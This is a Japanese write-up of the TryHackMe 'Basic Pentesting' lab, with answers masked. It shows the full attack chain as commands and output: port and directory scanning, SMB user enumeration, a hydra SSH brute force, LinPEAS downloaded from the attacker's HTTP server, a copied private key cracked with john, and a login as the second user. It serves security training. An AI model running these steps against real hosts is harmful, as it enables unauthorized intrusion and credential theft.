Open7
[Try Hack Me]Basic Pentesting
kenryoFind the services exposed by the machine
nmapでポートを調べる。
バージョン検出、全ポート対象、リクエスト量を指定数以上に保つようにし、スキャン高速化。
nmap -sV -p- --min-rate 5000 10.10.75.0
┌──(kali㉿kali)-[~]
└─$ nmap -sV -p- --min-rate 5000 10.10.75.0
Starting Nmap 7.94 ( https://nmap.org ) at 2023-11-21 23:07 JST
Warning: 10.10.75.0 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.75.0
Host is up (0.25s latency).
Not shown: 60947 closed tcp ports (conn-refused), 4582 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
8080/tcp open http Apache Tomcat 9.0.7
Service Info: Host: BASIC2; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 97.88 seconds
What is the name of the hidden directory on the web server(enter name without /)?
GUIが嫌なのでdirbusterではなくdirsearchで調べる。
以下参考にインストール。
nmapの結果でApacheが80ポートで稼働していることが分かっている。
以下でディレクトを調べる。
python3 dirsearch.py -u http://10.10.75.0
┌──(root㉿kali)-[/home/kali/dirsearch]
└─# python3 dirsearch.py -u http://10.10.75.0
/home/kali/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkg_resources import DistributionNotFound, VersionConflict
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11715
Output: /home/kali/dirsearch/reports/http_10.10.75.0/_23-11-21_23-31-00.txt
Target: http://10.10.75.0/
[23:31:00] Starting:
[23:31:19] 403 - 296B - /.ht_wsr.txt
[23:31:20] 403 - 299B - /.htaccess.bak1
[23:31:20] 403 - 299B - /.htaccess.orig
[23:31:20] 403 - 301B - /.htaccess.sample
[23:31:20] 403 - 299B - /.htaccess.save
[23:31:20] 403 - 300B - /.htaccess_extra
[23:31:20] 403 - 297B - /.htaccess_sc
[23:31:20] 403 - 297B - /.htaccessOLD
[23:31:20] 403 - 299B - /.htaccess_orig
[23:31:20] 403 - 297B - /.htaccessBAK
[23:31:20] 403 - 298B - /.htaccessOLD2
[23:31:20] 403 - 289B - /.htm
[23:31:20] 403 - 290B - /.html
[23:31:20] 403 - 299B - /.htpasswd_test
[23:31:20] 403 - 296B - /.httr-oauth
[23:31:20] 403 - 295B - /.htpasswds
[23:33:46] 200 - 1KB - /■■■■■■/
[23:35:52] 403 - 298B - /server-status
[23:35:52] 403 - 299B - /server-status/
Task Completed
結果200で表示されたのが今回答えのディレクトリ(結果は隠します)
kenryoWhat is the username?
smbのポートが開いているのでenum4linuxで共有情報・ユーザ情報を見てみる。
enum4linux 10.10.109.151 -a
┌──(root㉿kali)-[/home/kali/dirsearch]
└─# enum4linux 10.10.109.151 -a
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Thu Nov 23 01:50:38 2023
=========================================( Target Information )=========================================
Target ........... 10.10.109.151
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
===========================( Enumerating Workgroup/Domain on 10.10.109.151 )===========================
[+] Got domain/workgroup name: WORKGROUP
===============================( Nbtstat Information for 10.10.109.151 )===============================
Looking up status of 10.10.109.151
BASIC2 <00> - B <ACTIVE> Workstation Service
BASIC2 <03> - B <ACTIVE> Messenger Service
BASIC2 <20> - B <ACTIVE> File Server Service
..__MSBROWSE__. <01> - <GROUP> B <ACTIVE> Master Browser
WORKGROUP <00> - <GROUP> B <ACTIVE> Domain/Workgroup Name
WORKGROUP <1d> - B <ACTIVE> Master Browser
WORKGROUP <1e> - <GROUP> B <ACTIVE> Browser Service Elections
MAC Address = 00-00-00-00-00-00
===================================( Session Check on 10.10.109.151 )===================================
[+] Server 10.10.109.151 allows sessions using username '', password ''
================================( Getting domain SID for 10.10.109.151 )================================
Domain Name: WORKGROUP
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup
==================================( OS information on 10.10.109.151 )==================================
[E] Can't get OS info with smbclient
[+] Got OS info for 10.10.109.151 from srvinfo:
BASIC2 Wk Sv PrQ Unx NT SNT Samba Server 4.3.11-Ubuntu
platform_id : 500
os version : 6.1
server type : 0x809a03
=======================================( Users on 10.10.109.151 )=======================================
Use of uninitialized value $users in print at ./enum4linux.pl line 972.
Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 975.
Use of uninitialized value $users in print at ./enum4linux.pl line 986.
Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 988.
=================================( Share Enumeration on 10.10.109.151 )=================================
Sharename Type Comment
--------- ---- -------
Anonymous Disk
IPC$ IPC IPC Service (Samba Server 4.3.11-Ubuntu)
Reconnecting with SMB1 for workgroup listing.
Server Comment
--------- -------
Workgroup Master
--------- -------
WORKGROUP BASIC2
[+] Attempting to map shares on 10.10.109.151
//10.10.109.151/Anonymous Mapping: OK Listing: OK Writing: N/A
[E] Can't understand response:
NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*
//10.10.109.151/IPC$ Mapping: N/A Listing: N/A Writing: N/A
===========================( Password Policy Information for 10.10.109.151 )===========================
[+] Attaching to 10.10.109.151 using a NULL share
[+] Trying protocol 139/SMB...
[+] Found domain(s):
[+] BASIC2
[+] Builtin
[+] Password Info for Domain: BASIC2
[+] Minimum password length: 5
[+] Password history length: None
[+] Maximum password age: 37 days 6 hours 21 minutes
[+] Password Complexity Flags: 000000
[+] Domain Refuse Password Change: 0
[+] Domain Password Store Cleartext: 0
[+] Domain Password Lockout Admins: 0
[+] Domain Password No Clear Change: 0
[+] Domain Password No Anon Change: 0
[+] Domain Password Complex: 0
[+] Minimum password age: None
[+] Reset Account Lockout Counter: 30 minutes
[+] Locked Account Duration: 30 minutes
[+] Account Lockout Threshold: None
[+] Forced Log off Time: 37 days 6 hours 21 minutes
[+] Retieved partial password policy with rpcclient:
Password Complexity: Disabled
Minimum Password Length: 5
======================================( Groups on 10.10.109.151 )======================================
[+] Getting builtin groups:
[+] Getting builtin group memberships:
[+] Getting local groups:
[+] Getting local group memberships:
[+] Getting domain groups:
[+] Getting domain group memberships:
==================( Users on 10.10.109.151 via RID cycling (RIDS: 500-550,1000-1050) )==================
[I] Found new SID:
S-1-22-1
[I] Found new SID:
S-1-5-32
[I] Found new SID:
S-1-5-32
[I] Found new SID:
S-1-5-32
[I] Found new SID:
S-1-5-32
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\kay (Local User)
S-1-22-1-1001 Unix User\jan (Local User)
[+] Enumerating users using SID S-1-5-32 and logon username '', password ''
S-1-5-32-544 BUILTIN\Administrators (Local Group)
S-1-5-32-545 BUILTIN\Users (Local Group)
S-1-5-32-546 BUILTIN\Guests (Local Group)
S-1-5-32-547 BUILTIN\Power Users (Local Group)
S-1-5-32-548 BUILTIN\Account Operators (Local Group)
S-1-5-32-549 BUILTIN\Server Operators (Local Group)
S-1-5-32-550 BUILTIN\Print Operators (Local Group)
[+] Enumerating users using SID S-1-5-21-2853212168-2008227510-3551253869 and logon username '', password ''
S-1-5-21-2853212168-2008227510-3551253869-501 BASIC2\nobody (Local User)
S-1-5-21-2853212168-2008227510-3551253869-513 BASIC2\None (Domain Group)
===============================( Getting printer info for 10.10.109.151 )===============================
No printers returned.
enum4linux complete on Thu Nov 23 02:09:29 2023
ユーザとしてkayとjanがいることがわかった。
共有情報Anonymousがパスワードなしで見れそうなのでsmbclientで試す。
smbclient //10.10.109.151/Anonymous -U Anonymous
┌──(root㉿kali)-[/home/kali/dirsearch]
└─# smbclient //10.10.109.151/Anonymous -U Anonymous
Password for [WORKGROUP\Anonymous]:
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Fri Apr 20 02:31:20 2018
.. D 0 Fri Apr 20 02:13:06 2018
staff.txt N 173 Fri Apr 20 02:29:55 2018
14318640 blocks of size 1024. 10822632 blocks available
smb: \>
staff.txtをmoreコマンドで見てみる。
Announcement to staff:
PLEASE do not upload non-work-related items to this share. I know it's all in fun, but
this is how mistakes happen. (This means you too, Jan!)
-Kay
What is the password?
sshが開いていたので先ほどのユーザ名が使われていると仮定しhydraでブルートフォースしてみる。
hydra -l jan -P rockyou.txt 10.10.109.151 ssh -v
┌──(kali㉿kali)-[~]
└─$ hydra -l jan -P rockyou.txt 10.10.109.151 ssh -v
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-11-23 03:25:11
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344398 login tries (l:1/p:14344398), ~896525 tries per task
[DATA] attacking ssh://10.10.109.151:22/
[VERBOSE] Resolving addresses ... [VERBOSE] resolving done
[INFO] Testing if password authentication is supported by ssh://jan@10.10.109.151:22
[INFO] Successful, password authentication is supported by ssh://10.10.109.151:22
[ERROR] could not connect to target port 22: Socket error: Connection reset by peer
[ERROR] ssh protocol error
[VERBOSE] Disabled child 10 because of too many errors
[STATUS] 163.00 tries/min, 163 tries in 00:01h, 14344236 to do in 1466:42h, 15 active
[ERROR] could not connect to target port 22: Socket error: Connection reset by peer
[ERROR] ssh protocol error
[VERBOSE] Retrying connection for child 2
[ERROR] could not connect to target port 22: Socket error: Connection reset by peer
[ERROR] ssh protocol error
[VERBOSE] Retrying connection for child 12
[ERROR] could not connect to target port 22: Socket error: disconnected
[ERROR] ssh protocol error
[VERBOSE] Retrying connection for child 12
[ERROR] could not connect to target port 22: Socket error: disconnected
[ERROR] ssh protocol error
[VERBOSE] Retrying connection for child 5
[STATUS] 105.33 tries/min, 316 tries in 00:03h, 14344083 to do in 2269:39h, 15 active
[ERROR] could not connect to target port 22: Socket error: Connection reset by peer
[ERROR] ssh protocol error
[VERBOSE] Retrying connection for child 5
[ERROR] could not connect to target port 22: Socket error: disconnected
[ERROR] ssh protocol error
[VERBOSE] Retrying connection for child 5
[ERROR] could not connect to target port 22: Socket error: disconnected
[ERROR] ssh protocol error
[VERBOSE] Retrying connection for child 5
[ERROR] could not connect to target port 22: Socket error: disconnected
[ERROR] ssh protocol error
[VERBOSE] Retrying connection for child 3
[ERROR] could not connect to target port 22: Socket error: Connection reset by peer
[ERROR] ssh protocol error
[VERBOSE] Retrying connection for child 12
[ERROR] could not connect to target port 22: Socket error: Connection reset by peer
[ERROR] ssh protocol error
[VERBOSE] Retrying connection for child 12
[ERROR] could not connect to target port 22: Socket error: disconnected
[ERROR] ssh protocol error
[VERBOSE] Retrying connection for child 1
[ERROR] could not connect to target port 22: Socket error: disconnected
[ERROR] ssh protocol error
[VERBOSE] Retrying connection for child 12
[ERROR] could not connect to target port 22: Socket error: disconnected
[ERROR] ssh protocol error
[VERBOSE] Retrying connection for child 1
[ERROR] could not connect to target port 22: Socket error: disconnected
[ERROR] ssh protocol error
[VERBOSE] Retrying connection for child 1
[ERROR] could not connect to target port 22: Socket error: disconnected
[ERROR] ssh protocol error
[VERBOSE] Retrying connection for child 6
[ERROR] could not connect to target port 22: Socket error: Connection reset by peer
[ERROR] ssh protocol error
[VERBOSE] Retrying connection for child 6
[ERROR] could not connect to target port 22: Socket error: Connection reset by peer
[ERROR] ssh protocol error
[VERBOSE] Retrying connection for child 6
[ERROR] could not connect to target port 22: Socket error: disconnected
[ERROR] ssh protocol error
[VERBOSE] Retrying connection for child 2
[ERROR] could not connect to target port 22: Socket error: disconnected
[ERROR] ssh protocol error
[VERBOSE] Retrying connection for child 6
[ERROR] could not connect to target port 22: Socket error: disconnected
[ERROR] ssh protocol error
[VERBOSE] Retrying connection for child 2
[ERROR] could not connect to target port 22: Socket error: Connection reset by peer
[ERROR] ssh protocol error
[VERBOSE] Retrying connection for child 2
[ERROR] could not connect to target port 22: Socket error: Connection reset by peer
[ERROR] ssh protocol error
[VERBOSE] Retrying connection for child 6
[ERROR] could not connect to target port 22: Socket error: Connection reset by peer
[ERROR] ssh protocol error
[VERBOSE] Retrying connection for child 6
[ERROR] could not connect to target port 22: Socket error: disconnected
[ERROR] ssh protocol error
[VERBOSE] Retrying connection for child 5
[ERROR] could not connect to target port 22: Socket error: disconnected
[ERROR] ssh protocol error
[VERBOSE] Retrying connection for child 1
[STATUS] 105.86 tries/min, 741 tries in 00:07h, 14343658 to do in 2258:21h, 15 active
[ERROR] could not connect to target port 22: Socket error: disconnected
[ERROR] ssh protocol error
[VERBOSE] Retrying connection for child 6
[ERROR] could not connect to target port 22: Socket error: disconnected
[ERROR] ssh protocol error
[VERBOSE] Retrying connection for child 2
[22][ssh] host: 10.10.109.151 login: jan password: ■■■■■
[STATUS] attack finished for 10.10.109.151 (waiting for children to complete tests)
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 1 final worker threads did not complete until end.
[ERROR] 1 target did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-11-23 03:33:06
What is the name of the other user you found(all lower case)?
入手したjanのパスワードでsshログインすると成功した。
ホームディレクトリとしてjanとkayがあった。
kayを探るとsshキーがあった。以降の問題文的にこれを入手する必要がある。
┌──(kali㉿kali)-[~]
└─$ ssh jan@10.10.159.67
The authenticity of host '10.10.159.67 (10.10.159.67)' can't be established.
ED25519 key fingerprint is SHA256:XKjDkLKocbzjCch0Tpriw1PeLPuzDufTGZa4xMDA+o4.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.159.67' (ED25519) to the list of known hosts.
jan@10.10.159.67's password:
Welcome to Ubuntu 16.04.4 LTS (GNU/Linux 4.4.0-119-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
0 packages can be updated.
0 updates are security updates.
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
Last login: Mon Apr 23 15:55:45 2018 from 192.168.56.102
jan@basic2:~$ ls
jan@basic2:~$ pwd
/home/jan
jan@basic2:~$ cd ..
jan@basic2:/home$ ls
jan kay
jan@basic2:/home$ cd kay/
jan@basic2:/home/kay$ ls -la
total 48
drwxr-xr-x 5 kay kay 4096 Apr 23 2018 .
drwxr-xr-x 4 root root 4096 Apr 19 2018 ..
-rw------- 1 kay kay 756 Apr 23 2018 .bash_history
-rw-r--r-- 1 kay kay 220 Apr 17 2018 .bash_logout
-rw-r--r-- 1 kay kay 3771 Apr 17 2018 .bashrc
drwx------ 2 kay kay 4096 Apr 17 2018 .cache
-rw------- 1 root kay 119 Apr 23 2018 .lesshst
drwxrwxr-x 2 kay kay 4096 Apr 23 2018 .nano
-rw------- 1 kay kay 57 Apr 23 2018 pass.bak
-rw-r--r-- 1 kay kay 655 Apr 17 2018 .profile
drwxr-xr-x 2 kay kay 4096 Apr 23 2018 .ssh
-rw-r--r-- 1 kay kay 0 Apr 17 2018 .sudo_as_admin_successful
-rw------- 1 root kay 538 Apr 23 2018 .viminfo
jan@basic2:/home/kay$ cd .ssh/
jan@basic2:/home/kay/.ssh$ ls -al
total 20
drwxr-xr-x 2 kay kay 4096 Apr 23 2018 .
drwxr-xr-x 5 kay kay 4096 Apr 23 2018 ..
-rw-rw-r-- 1 kay kay 771 Apr 23 2018 authorized_keys
-rw-r--r-- 1 kay kay 3326 Apr 19 2018 id_rsa
-rw-r--r-- 1 kay kay 771 Apr 19 2018 id_rsa.pub
jan@basic2:/home/kay/.ssh$
Enumerate the machine to find any vectors for privilege escalation
LinPEASで列挙してみる。
wgetでダウンロードし、ローカルのHTTPサーバを立ち上げる。
┌──(kali㉿kali)-[~]
└─$ wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh
--2023-11-23 13:36:54-- https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh
Resolving github.com (github.com)... 20.27.177.113
Connecting to github.com (github.com)|20.27.177.113|:443... connected.
HTTP request sent, awaiting response... 302 Found
Location: https://github.com/carlospolop/PEASS-ng/releases/download/20231119-295ce4ea/linpeas.sh [following]
--2023-11-23 13:36:54-- https://github.com/carlospolop/PEASS-ng/releases/download/20231119-295ce4ea/linpeas.sh
Reusing existing connection to github.com:443.
HTTP request sent, awaiting response... 302 Found
Location: https://objects.githubusercontent.com/github-production-release-asset-2e65be/165548191/2bafa7e6-e114-4e70-880e-abea7589537d?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIAIWNJYAX4CSVEH53A%2F20231123%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20231123T043727Z&X-Amz-Expires=300&X-Amz-Signature=1bff049a2bff176fb32fca404a293b59c7aa2db9efe8987b00f9f92512b0d650&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=165548191&response-content-disposition=attachment%3B%20filename%3Dlinpeas.sh&response-content-type=application%2Foctet-stream [following]
--2023-11-23 13:36:54-- https://objects.githubusercontent.com/github-production-release-asset-2e65be/165548191/2bafa7e6-e114-4e70-880e-abea7589537d?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIAIWNJYAX4CSVEH53A%2F20231123%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20231123T043727Z&X-Amz-Expires=300&X-Amz-Signature=1bff049a2bff176fb32fca404a293b59c7aa2db9efe8987b00f9f92512b0d650&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=165548191&response-content-disposition=attachment%3B%20filename%3Dlinpeas.sh&response-content-type=application%2Foctet-stream
Resolving objects.githubusercontent.com (objects.githubusercontent.com)... 185.199.111.133, 185.199.108.133, 185.199.109.133, ...
Connecting to objects.githubusercontent.com (objects.githubusercontent.com)|185.199.111.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 847815 (828K) [application/octet-stream]
Saving to: ‘linpeas.sh’
linpeas.sh 100%[=============================>] 827.94K --.-KB/s in 0.09s
2023-11-23 13:36:55 (9.21 MB/s) - ‘linpeas.sh’ saved [847815/847815]
┌──(kali㉿kali)-[~]
└─$ python -m http.server 8080
Serving HTTP on 0.0.0.0 port 8080 (http://0.0.0.0:8080/) ...
janでSSHログインし、立ち上げたHTTPサーバに対してwgetでLinPEASのshellファイルをダウンロード。
ホームディレクトリに書き込み権限がなかったため、tmpディレクトリに書き込む。
jan@basic2:~$ wget http://10.8.120.61:8080/linpeas.sh
--2023-11-22 23:40:24-- http://10.8.120.61:8080/linpeas.sh
Connecting to 10.8.120.61:8080... connected.
HTTP request sent, awaiting response... 200 OK
Length: 847815 (828K) [text/x-sh]
linpeas.sh: Permission denied
Cannot write to ‘linpeas.sh’ (Success).
jan@basic2:~$ cd /tmp/
jan@basic2:/tmp$ wget http://10.8.120.61:8080/linpeas.sh
--2023-11-22 23:41:31-- http://10.8.120.61:8080/linpeas.sh
Connecting to 10.8.120.61:8080... connected.
HTTP request sent, awaiting response... 200 OK
Length: 847815 (828K) [text/x-sh]
Saving to: ‘linpeas.sh’
linpeas.sh 100%[=============================>] 827.94K 451KB/s in 1.8s
2023-11-22 23:41:34 (451 KB/s) - ‘linpeas.sh’ saved [847815/847815]
jan@basic2:/tmp$
ssh linpeas.shでターゲットの列挙開始。
出力情報を抜粋。ユーザ情報やSSHに関する情報を取得することができた。
...
╔══════════╣ Users with console
jan:x:1001:1001::/home/jan:/bin/bash
kay:x:1000:1000:Kay,,,:/home/kay:/bin/bash
root:x:0:0:root:/root:/bin/bash
...
╔══════════╣ Searching ssl/ssh files
╔══════════╣ Analyzing SSH Files (limit 70)
-rw-r--r-- 1 kay kay 3326 Apr 19 2018 /home/kay/.ssh/id_rsa
-----BEGIN RSA PRIVATE KEY-----
...
══╣ Possible private SSH keys were found!
/home/kay/.ssh/id_rsa
...
╔══════════╣ Analyzing Other Interesting Files (limit 70)
-rw-r--r-- 1 root root 3771 Aug 31 2015 /etc/skel/.bashrc
-rw-r--r-- 1 kay kay 3771 Apr 17 2018 /home/kay/.bashrc
-rw------- 1 root jan 47 Apr 23 2018 /home/jan/.lesshst
-rw------- 1 root kay 119 Apr 23 2018 /home/kay/.lesshst
-rw-r--r-- 1 root root 655 May 16 2017 /etc/skel/.profile
-rw-r--r-- 1 kay kay 655 Apr 17 2018 /home/kay/.profile
-rw-r--r-- 1 kay kay 0 Apr 17 2018 /home/kay/.sudo_as_admin_successful
...
What is the final password you obtain?
kayフォルダにあった秘密鍵をscpでダウンロードする。
┌──(kali㉿kali)-[~]
└─$ scp jan@10.10.96.211:/home/kay/.ssh/id_rsa ~
jan@10.10.96.211's password:
id_rsa 100% 3326 5.7KB/s 00:00
id_rsaのパスワードをJohn the Ripperでクラックする。
まず、ssh2john.pyで解読可能なハッシュ値をid_rsaから抽出する。
次にjohnコマンドでハッシュ値を解析する。
python /usr/share/john/ssh2john.py id_rsa > id_rsa.txt
john --wordlist=rockyou.txt id_rsa.txt
┌──(kali㉿kali)-[~]
└─$ python /usr/share/john/ssh2john.py id_rsa > id_rsa.txt
┌──(kali㉿kali)-[~]
└─$ john --wordlist=rockyou.txt id_rsa.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
■■■■■ (id_rsa)
1g 0:00:00:00 DONE (2023-11-23 20:40) 20.00g/s 1654Kp/s 1654Kc/s 1654KC/s ■■■■■..■■■■■
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
秘密鍵の権限を600に設定し、kayでログインする。
ホームディレクトリにpass.bakがあり、中身をみると今回の答えが記載されている。
┌──(kali㉿kali)-[~]
└─$ chmod 600 id_rsa
┌──(kali㉿kali)-[~]
└─$ ssh -i id_rsa kay@10.10.96.211
Enter passphrase for key 'id_rsa':
Welcome to Ubuntu 16.04.4 LTS (GNU/Linux 4.4.0-119-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
0 packages can be updated.
0 updates are security updates.
Last login: Mon Apr 23 16:04:07 2018 from 192.168.56.102
kay@basic2:~$ ls
pass.bak
kay@basic2:~$ cat pass.bak
■■■■■